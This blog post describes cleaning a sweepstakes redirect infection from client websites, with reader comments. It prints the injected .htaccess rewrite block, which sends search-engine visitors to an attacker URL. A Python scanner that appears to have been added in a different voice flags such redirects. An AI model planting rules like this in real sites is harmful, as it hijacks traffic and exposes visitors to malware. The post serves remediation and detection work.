Fixing Sweepstakes Malware Virus

This week, a client of mine ran into an issue in which their sites were sending back “Site contains malware” errors. When going to these sites through a search engine, a new URL was triggered and the user was redirected to their original search engine.

After spending some time cleaning this up I wrote the following documentation. There are already several posts on this out there, but the more posts there are, the easier it will be for someone to fix it.

Keep in mind, the sites I was fixing were not WordPress:

My Documentation of the Malware

To give you some details of what I’ve been doing and for records, I’ve been looking at our main directories to check if anything has been updated recently.

The majority of things that are infected were updated on 11/10/11. The infected files include .htaccess and usually the ‘images’ directory, in which two .php files are placed, usually named by firstname_lastname.php or firstname_firstname.php.

In the .htaccess file, I found that a rewrite rule had been inserted which redirects any visitor arriving from Google, Bing or another major search engine (it keys on the HTTP referer, so someone typing the address directly never sees it). The code is below:

<IfModule mod_rewrite.c>
# Injected block: the RewriteCond only matches when the referer contains a
# search-engine name, so only search traffic is sent to the attacker's URL.
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>

The same redirect URL also appears in the site's HTML, injected via JavaScript; removing that injected script, together with the .htaccess block, clears the problem.

I have backed up all .htaccess files in case there are complications after the removal of the file from the directory.

The dates on the .php files were 11/07/11 and 8/23/11. I'm not sure whether those dates are significant, but that's when they were placed in the directories.

The .php files are always 28,278 KB.

Sites that appeared after 8/23/11 only had the 11/07/2011 .php file.
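To turn the indicators above into a repeatable check, here is an added scanner (my own example, not part of the original post or any vendor tool). It walks a web root, flags any .htaccess whose RewriteCond keys on a search-engine referer and whose RewriteRule redirects to a host you do not own, and lists .php files sitting inside image directories. The sample .htaccess and the web root it builds are constructed for the demo; own_hosts, the image directory names and the file names are assumptions you would adjust for your site.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

# Constructed sample modelled on the injected .htaccess shown above (not taken from the site).
SAMPLE_HTACCESS = """RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
"""

# A RewriteCond keyed on the search-engine referer, followed (anywhere after) by a
# RewriteRule that issues an external redirect (R flag) to an absolute URL.
REFERER_COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+\S*(google|bing|yahoo|msn|aol|ask)",
                          re.IGNORECASE | re.MULTILINE)
REDIRECT_RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://[^\s\]]+)\s+\[[^\]]*\bR\b[^\]]*\]",
                           re.IGNORECASE | re.MULTILINE)

def htaccess_findings(text, own_hosts=()):
    """Return (target_url, host) for each referer-conditioned redirect to a host we do not own."""
    own = {h.lower() for h in own_hosts}
    if not REFERER_COND.search(text):
        return []
    hits = [(m.group(1), (urlparse(m.group(1)).hostname or "").lower()) for m in REDIRECT_RULE.finditer(text)]
    return [(url, host) for url, host in hits if host not in own]

def scan_webroot(webroot, own_hosts=(), image_dirs=("images", "img")):
    """Walk a web root: flag suspicious .htaccess files and .php files dropped into image folders."""
    root = Path(webroot)
    report = {"htaccess": {}, "php_in_images": []}
    for ht in root.rglob(".htaccess"):
        found = htaccess_findings(ht.read_text(errors="replace"), own_hosts)
        if found:
            report["htaccess"][ht.relative_to(root).as_posix()] = found
    for php in root.rglob("*.php"):
        if php.parent.name.lower() in image_dirs:  # e.g. images/firstname_lastname.php
            report["php_in_images"].append((php.relative_to(root).as_posix(), php.stat().st_size))
    return report

def demo():
    """Build a throwaway web root containing the constructed sample and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".htaccess").write_text(SAMPLE_HTACCESS)
        (root / "images").mkdir()
        (root / "images" / "john_smith.php").write_text("<?php /* constructed dummy */ ?>")  # placeholder name
        (root / "index.php").write_text("<?php echo 'legit'; ?>")
        return scan_webroot(root, own_hosts=("example.com",))
```

Run scan_webroot against a backup copy of the site rather than the live root, and compare the reported file sizes with the 28,278 figure noted above before deleting anything.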

Closing Thoughts

If something like this happens to you, it’s okay to freak out. After you have finished freaking out, take a deep breath, step back from the problem and fix it. It may take some looking around in the directories, but it’s better than having your site listed as malware.

Below are some links to other posts related to this malware:
Sucuri Research Blog – .htaccess Redirect
Sucuri Research Blog – Javascript Injection

3 Comments
Deb
9 years ago

Hello John,

Thank you sooooo much for posting this. I just got an email from a client with the same issue and she included a link to your blog post. She has two WordPress sites and both were affected. You are greatly appreciated for sharing your findings!

Deb

Deb
9 years ago

Just an FYI – just tried to visit the links you give under your Closing Thoughts and I’m getting a 404 for both of them. Just in case you want to check on this.

John Hartley is a Director of Product Engineering at Beam Dental in Columbus, OH. With 5+ years of leadership experience he has worked in startups, agencies, and began his career as a freelance Front End Developer. Always looking to iterate, this blog is a place for him to share his knowledge as well as hone his craft, challenge assumptions, and build a strong base of leadership and management knowledge. Connect with him on LinkedIn
